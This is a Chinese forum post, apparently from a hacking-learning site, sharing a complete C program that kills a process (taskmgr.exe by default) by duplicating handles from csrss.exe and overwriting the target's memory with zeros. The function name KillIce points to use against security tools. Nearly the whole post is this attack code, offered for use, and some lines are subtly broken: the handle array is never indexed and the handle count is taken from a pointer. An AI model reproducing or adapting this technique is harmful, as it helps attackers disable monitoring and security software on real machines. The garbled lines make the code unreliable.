HanDs
管理员

[Visual Studio文章] 进程填零结束进程 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

/* This simple app demonstrates how to kill process by writing process's memory.
  Write by EP_X0FF and DNY,I just extract it to C      ---- zjjmj2002
*/
#include <Windows.h>
#include <Ntsecapi.h>
#include <Aclapi.h>
#include <tlhelp32.h>

#pragma comment (lib,"ntdll.lib")    // Copy From DDK
#pragma comment (lib,"Kernel32.lib")
#pragma comment (lib,"Advapi32.lib")
#pragma comment(linker, "/ENTRY:main")

//------------------ 数据类型声明开始 --------------------//
typedef struct _PROCESS_BASIC_INFORMATION {
    NTSTATUS ExitStatus;
    ULONG PebBaseAddress;
    ULONG_PTR AffinityMask;
    LONG BasePriority;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION;
typedef PROCESS_BASIC_INFORMATION *PPROCESS_BASIC_INFORMATION;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG            ProcessId;
    UCHAR            ObjectTypeNumber;
    UCHAR            Flags;
    USHORT            Handle;
    PVOID            Object;
    ACCESS_MASK        GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
typedef struct _SYSTEM_MODULE_INFORMATION {
  ULONG Reserved[2];
  PVOID Base;
  ULONG Size;
  ULONG Flags;
  USHORT Index;
  USHORT Unknown;
  USHORT LoadCount;
  USHORT ModuleNameOffset;
  CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef struct _OBJECT_ATTRIBUTES {
  ULONG Length;
  HANDLE RootDirectory;
  PUNICODE_STRING ObjectName;
  ULONG Attributes;
  PVOID SecurityDescriptor;
  PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

typedef enum _SECTION_INHERIT {
  ViewShare = 1,
  ViewUnmap = 2
} SECTION_INHERIT;

typedef struct _MY_PROCESS_INFO {
  ULONG PID;
  ULONG KPEB;
  ULONG CR3;
  CHAR Name[16];
  ULONG Reserved;
} MY_PROCESS_INFO, *PMY_PROCESS_INFO;
typedef struct _CLIENT_ID {
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID;
typedef CLIENT_ID *PCLIENT_ID;

typedef long NTSTATUS;
//------------------ 数据类型声明结束 --------------------//

//--------------------- 预定义开始 -----------------------//
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_SUCCESS        0x00000000
#define STATUS_UNSUCCESSFUL      0xC0000001
#define STATUS_NOT_IMPLEMENTED    0xC0000002
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
#define STATUS_INVALID_PARAMETER  0xC000000D
#define STATUS_ACCESS_DENIED    0xC0000022
#define STATUS_BUFFER_TOO_SMALL  0xC0000023
#define OBJ_KERNEL_HANDLE      0x00000200
#define SystemModuleInformation  11
#define SystemHandleInformation  0x10

#define InitializeObjectAttributes( p, n, a, r, s ) { (p)->Length = sizeof( OBJECT_ATTRIBUTES );(p)->RootDirectory = r;                (p)->Attributes = a;                    (p)->ObjectName = n;                      (p)->SecurityDescriptor = s;                (p)->SecurityQualityOfService = NULL;        }
//--------------------- 预定义结束 -----------------------//

//------------------ Native API声明开始 ------------------//

NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation(
  ULONG SystemInformationClass,
  PVOID SystemInformation,
  ULONG SystemInformationLength,
  PULONG ReturnLength
  );
NTSYSAPI
NTSTATUS
NTAPI
ZwOpenProcess(

  OUT PHANDLE            ProcessHandle,
  IN ACCESS_MASK          AccessMask,
  IN POBJECT_ATTRIBUTES  ObjectAttributes,
  IN PCLIENT_ID          ClientId );
NTSYSAPI
NTSTATUS
NTAPI
ZwAllocateVirtualMemory(

  IN HANDLE              ProcessHandle,
  IN OUT PVOID            *BaseAddress,
  IN ULONG                ZeroBits,
  IN OUT PULONG          RegionSize,
  IN ULONG                AllocationType,
  IN ULONG                Protect );
NTSYSAPI
NTSTATUS
NTAPI
ZwDuplicateObject(

  IN HANDLE              SourceProcessHandle,
  IN PHANDLE              SourceHandle,
  IN HANDLE              TargetProcessHandle,
  OUT PHANDLE            TargetHandle,
  IN ACCESS_MASK          DesiredAccess OPTIONAL,
  IN BOOLEAN              InheritHandle,
  IN ULONG                Options );
NTSYSAPI
NTSTATUS
NTAPI
ZwQueryInformationProcess(

  IN HANDLE              ProcessHandle,
  IN PVOID         ProcessInformationClass,
  OUT PVOID              ProcessInformation,
  IN ULONG                ProcessInformationLength,
  OUT PULONG              ReturnLength );
NTSYSAPI
NTSTATUS
NTAPI
ZwProtectVirtualMemory(

  IN HANDLE              ProcessHandle,
  IN OUT PVOID            *BaseAddress,
  IN OUT PULONG          NumberOfBytesToProtect,
  IN ULONG                NewAccessProtection,
  OUT PULONG              OldAccessProtection );
NTSYSAPI
NTSTATUS
NTAPI
ZwWriteVirtualMemory(

  IN HANDLE              ProcessHandle,
  IN PVOID                BaseAddress,
  IN PVOID                Buffer,
  IN ULONG                NumberOfBytesToWrite,
  OUT PULONG              NumberOfBytesWritten OPTIONAL );

NTSYSAPI
NTSTATUS
NTAPI
ZwClose(

  IN HANDLE              ObjectHandle );

NTSYSAPI
NTSTATUS
NTAPI
ZwFreeVirtualMemory(

  IN HANDLE              ProcessHandle,
  IN PVOID                *BaseAddress,
  IN OUT PULONG          RegionSize,
  IN ULONG                FreeType );
 
//------------------ Native API声明结束 ------------------//

//------------------ 程序正式开始 ------------------//

DWORD GetPidByName(char *szName)
{
HANDLE hProcessSnap = INVALID_HANDLE_VALUE;
PROCESSENTRY32 pe32={0};
DWORD dwRet=0;

hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(hProcessSnap == INVALID_HANDLE_VALUE)return 0;

pe32.dwSize = sizeof(PROCESSENTRY32);
if(Process32First(hProcessSnap, &pe32))
{
  do
  {
  if(lstrcmpi(szName,pe32.szExeFile)==0)
  {
    dwRet=pe32.th32ProcessID;
    break;
  }
  }while (Process32Next(hProcessSnap,&pe32));
}
else return 0;

if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap);
return dwRet;
}

void KillIce(ULONG dwProcessId)
{
  HANDLE     ph, h_dup;
  ULONG     bytesIO;
  PVOID     buf;
  ULONG        i;
  CLIENT_ID    cid1;
  OBJECT_ATTRIBUTES    attr;
  HANDLE        csrss_id;
  HANDLE    SnapShotHandle;
  PROCESS_BASIC_INFORMATION    pbi;
  PVOID        p0, p1;
  ULONG        sz, oldp;
  ULONG        NumOfHandle;
  PSYSTEM_HANDLE_INFORMATION    h_info; 

  csrss_id = (HANDLE)GetPidByName("csrss.exe");
  attr.Length = sizeof(OBJECT_ATTRIBUTES);
  attr.RootDirectory = 0;
  attr.ObjectName = 0;
  attr.Attributes = 0;
  attr.SecurityDescriptor = 0;
  attr.SecurityQualityOfService = 0;

  cid1.UniqueProcess = csrss_id;
  cid1.UniqueThread = 0;
  ZwOpenProcess(&ph, PROCESS_ALL_ACCESS, &attr, &cid1);

  bytesIO = 0x400000;
  buf = 0;
  ZwAllocateVirtualMemory(GetCurrentProcess(), &buf, 0, &bytesIO, MEM_COMMIT, PAGE_READWRITE);
  ZwQuerySystemInformation(SystemHandleInformation, buf, 0x400000, &bytesIO);
  NumOfHandle = (ULONG)buf;
  h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);

  for (i= 0 ; i<NumOfHandle; i++)
  {
  if ((h_info.ProcessId == (ULONG)csrss_id)&&(h_info.ObjectTypeNumber == 5))
    {
      if (ZwDuplicateObject(ph, (PHANDLE)h_info.Handle, (HANDLE)-1, &h_dup,
        0, 0, DUPLICATE_SAME_ACCESS) == STATUS_SUCCESS)
        ZwQueryInformationProcess(h_dup, 0, &pbi, sizeof(pbi), &bytesIO);
        if (pbi.UniqueProcessId == dwProcessId)
        {
          MessageBox(0, "目标已确定!", "OK", MB_OK);
          for (i = 0x1000; i<0x80000000; i = i + 0x1000)
          {
          p0 = (PVOID)i;
          p1 = p0;
          sz = 0x1000;
            if (ZwProtectVirtualMemory(h_dup, &p1, &sz, PAGE_EXECUTE_READWRITE, &oldp) == STATUS_SUCCESS)
              {             
              ZwWriteVirtualMemory(h_dup, p0, buf, 0x1000, &oldp);
              }         
            }
              MessageBox(0, "任务已完成!","OK", 0);
              ZwClose(h_dup);                       
          }
      }
  }

  bytesIO = 0;
  ZwFreeVirtualMemory(GetCurrentProcess(), &buf, &bytesIO, MEM_RELEASE);
     
 
}
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable)
{
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid);
tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;
AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
return((GetLastError() == ERROR_SUCCESS));
}
void main()
{   
    ULONG Pid;
    HANDLE hToken;
    OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
    EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);
    if (Pid = GetPidByName("taskmgr.exe"))
    {
        KillIce(Pid);
    }    
    ExitProcess(0);
}

 


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
进程 结束 进程
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复